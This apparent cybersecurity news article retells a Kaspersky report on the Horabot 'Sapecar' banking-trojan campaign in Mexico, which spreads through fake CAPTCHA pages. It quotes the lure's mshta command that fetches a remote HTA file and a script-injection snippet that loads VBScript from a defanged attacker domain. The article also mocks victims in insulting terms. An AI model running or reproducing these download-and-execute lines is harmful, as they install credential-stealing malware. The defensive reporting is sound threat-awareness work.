Ransomware & Malware

Horabot Sapecar Campaign Targets Mexico

Fake CAPTCHA? Click anyway? That's how Horabot's 'Sapecar' sneaks into Mexican banks. Kaspersky stopped it cold—but it's a reminder: vigilance isn't optional.

Infographic of Horabot Sapecar attack chain from CAPTCHA lure to payload deployment

Key Takeaways

  • Horabot's 'Sapecar' uses fake CAPTCHAs and mshta for initial access in Mexico.
  • Server-side polymorphism and heavy obfuscation evade basic detection.
  • Kaspersky EDR stopped it, but user training remains the weak link—expect regional spread.

What if that annoying CAPTCHA isn’t verifying you’re human—it’s recruiting you for a heist?

Horabot’s back. Yeah, that banking Trojan bundle with its email-spreading sidekick. This time, it’s dubbed ‘Sapecar,’ hitting Mexico hard. Our Kaspersky MDR team sniffed it out months ago, but the campaign’s still kicking. Skeptical? You should be. These clowns recycle the same playbook, yet users bite every time.

Why Does Horabot Refuse to Die?

Look, we’ve seen this movie. Horabot’s been documented before—check the links in the original SOC Files report—but it’s not fading. Why? Lazy attackers meet dumber victims. In Mexico, economic pressures make banking scams juicy. Remember the 2010s LatAm malware waves? ZeuS variants ravaged Brazil. Sapecar feels like their zombie cousin—same fake urgency, updated domains.

But here’s my hot take, absent from the original: this isn’t just persistence; it’s evolution by neglect. Attackers tweak server-side polymorphism (fancy for ‘random code vomit’), dodging AV signatures. Prediction? It’ll hop borders soon—US remittances to Mexico are a goldmine. Don’t say I didn’t warn you.

Short version: it’s alive because it works.

The alert hit like clockwork. Generic mshta detection—smart, simple. Kaspersky’s Endpoint Security played hero, nuking the process via proactive defense. No breach. Lucky customer.

But curiosity killed the cat? Nah, it fueled the hunt. Weekly meeting sparks analyst deep-dive. Boom—full kill chain mapped.

“The rule that triggered it is generic yet effective at detecting suspicious mshta activity.”

That’s the original gold. Straight from the SOC Files. Underrated truth: basics win wars.

Fake CAPTCHA: The Lure That Hooks Suckers

Stage one? Classic. URL like https://evs.grupotuis[.]buzz/0capcha17/. Looks legit—until it tells you to Run dialog, paste this gem:

mshta https://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta

HTA file drops. Blank window flashes. Grabs JS payload. Filler text? Just noise—obfuscation 101.

Users fall for it. Why? Pressure. ‘Verify now or lose access!’ Panic clicks.

And here’s the acerbic bit: if you’re pasting random commands from pop-ups, cybersecurity classes called—they want a refund.

Next up, server-side tricks. HTA births a script tag, yanks VBS from pdj.gruposhac[.]lat. Polymorphic—each fetch, slight code shuffle. Same dance, new dress.

var scriptEle = document.createElement(“script”); scriptEle.setAttribute(“src”, “https://pdj.gruposhac[.]lat/g1/ld1/”); scriptEle.setAttribute(“type”, “text/vbscript”); document.getElementsByTagName(‘head’)[0].appendChild(scriptEle);

Obfuscated mess. Custom decoder—Python-replicable, if you’re bored. Loads more JS, injects heavier VBS. Over 400 lines. Beast mode.

Anti-VM checks. Avast dodge. IP grab, exfil to C2. Downloads AutoIt exe, compiler, au3 script, blob—to C:\Users\Public\LAPTOP-0QF0NEUP4. Powershell pings URLs—one dead, one spreader stager.

Complex? Sure. Novel? Please. It’s Russian doll malware—layer after layer of ‘gotcha.’

The Payload Punch: Banking Trojan Meets Spreader

Heart of Sapecar: Horabot proper. Banking Trojan steals creds. Email spreader? Propagates via… you guessed it, more emails. Chain ends with compilation, execution. Full bundle deploys.

Kaspersky blocked it pre-payload. But imagine no EDR? Compromised Mexican bank accounts. Drained in hours.

Critique time: original report’s thorough—props—but glosses victim blame. Users, wake up. Training gaps here are criminal. Companies tout ‘awareness,’ yet CAPTCHAs fool execs?

Dry humor aside, this chain’s a masterclass in evasion. Polymorphism beats static scans. Environment checks laugh at sandboxes. Exfil’s stealthy.

Yet—predictable domains. grupotuis.buzz? Shac.lat? IOCs scream ‘track me.’

Is Mexico Just the Start?

Targeted? Yes. But Horabot’s global-ish. Past campaigns everywhere. Mexico’s pick? Proximity, maybe Spanish lures. Or testing ground.

Bold call: expect US spillover. Remittance apps, cross-border wires—ripe. LatAm banking malware history says so. 2024? It’ll adapt, hit fintech.

Defenses? Update EDR. Block mshta—harsh, but effective. Train idiots not to paste.

And attackers? Innovate or die. This relic status quo won’t last.

One sentence warning: ignore at your peril.

The takedown was textbook. But campaigns like Sapecar expose cracks. MDR shines, yet proactive beats reactive. Always.

Unique angle: parallels to Carbanak—old-school bank heists digitized. Same greed, new tech.

Wrapping messy: Horabot’s not dead. It’s dining on CAPTCHA scraps. Stay sharp.


🧬 Related Insights

Frequently Asked Questions

What is the Horabot Sapecar campaign?

Horabot’s latest Mexican push: fake CAPTCHA lures to banking Trojan and email spreader via mshta and polymorphic VBS.

How does Horabot malware spread?

Starts with phishing CAPTCHAs, chains through HTA/JS/VBS loaders to AutoIt payloads and C2 exfil.

Is Horabot only targeting Mexico?

No—past global campaigns; Mexico focus now, but likely to expand via economic ties.

Marcus Rivera
Written by

Tech journalist covering AI business and enterprise adoption. 10 years in B2B media.

Frequently asked questions

What is the Horabot <a href="/tag/sapecar-campaign/">Sapecar campaign</a>?
Horabot's latest Mexican push: fake CAPTCHA lures to banking Trojan and email spreader via mshta and polymorphic VBS.
How does Horabot malware spread?
Starts with phishing CAPTCHAs, chains through HTA/JS/VBS loaders to AutoIt payloads and C2 exfil.
Is Horabot only targeting Mexico?
No—past global campaigns; Mexico focus now, but likely to expand via economic ties.

Worth sharing?

Get the best Cybersecurity stories of the week in your inbox — no noise, no spam.

Originally reported by Securelist (Kaspersky)

Stay in the loop

The week's most important stories from Threat Digest, delivered once a week.